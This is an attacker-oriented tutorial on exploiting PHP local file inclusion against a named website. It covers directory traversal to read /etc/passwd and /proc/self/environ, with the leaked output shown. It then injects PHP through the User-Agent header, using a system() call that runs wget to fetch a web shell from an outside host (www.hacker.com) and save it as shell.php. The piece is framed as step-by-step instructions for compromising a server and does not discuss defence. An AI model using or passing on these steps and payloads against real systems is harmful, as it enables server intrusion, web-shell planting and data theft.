A file inclusion is a vulnerability which allows an attacker to access unauthorised file on web server and can execute the malicious code by using ‘include’ functional vulnerability. The local file inclusion LFI is a process of Including Local File available on webserver. This vulnerability occur when a user input contains the path of the file that has been included. When this input is not properly sanitised then an attacker give the some default files location and access all these sensitives files.
Lets suppose this website is vulnerable to local file inclusion attack:
Now lets replace contact.php with ../ and try the new URL:
Now after requesting this page we got an error. There is a big chance to have a Local File Inclusion vulnerability.
Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/roknifard/public_html/roknifard.com/view.php on line 1337
Now lets check for etc/passwd to see the if Local File Inclusion is vulnerable:
we got an error and now we include more directories to look for etc/passwd file
If you will get a page like the following, that means you have successfully Included a /etc/passwd file.
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin
We successfully included a file and our next step is to include a proc/self/environ file. So now replace /etc/passwd with /proc/self/environ file.
If you get something like the following, that means you have successfully included a proc/self/environ file.
DOCUMENT_ROOT=/home/roknifard/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.roknifard.com HTTP_REFERER=http://www.roknifard.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenvir on SCRIPT_FILENAME=/home/roknifard/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMINemail@example.com SERVER_NAME=www.roknifard.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE= Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/18.104.22.16835 Server at www.roknifard.com Port 80
proc/self/environ is accessible. If you got a blank page or an error, that means proc/self/environ is not accessible or the OS is a FreeBSD.
Now let’s inject our malicious code in proc/self/environ. We can inject our code in User-Agent HTTP Header. Use Tamper Data Add-on for Firefox to change the User-Agent. Start Tamper Data in Firefox and re-request the URL
Now Tamper this page and in user agent add you uploader script and then submit. You will get an uploader on /proc/self/environ page, just browse and upload your shell.
You can also upload your shell by downloading remotely using wget command.
<?system('wget www.hacker.com/shell.txt -O shell.php');?>
Add this command in user agent and request the page. Now our command is successfully executed and will download the .txt shell from www.hacker.com/shell.txt and save it as shell.php in the website directory. through system(), and our shell will be created. If didn’t work, try exec() because system() can be disabled on the webserver from php.ini.
Now lets check if our malicious code, if it was successfully injected. Lets check if the shell is present.
Our shell is there. Injection was successful.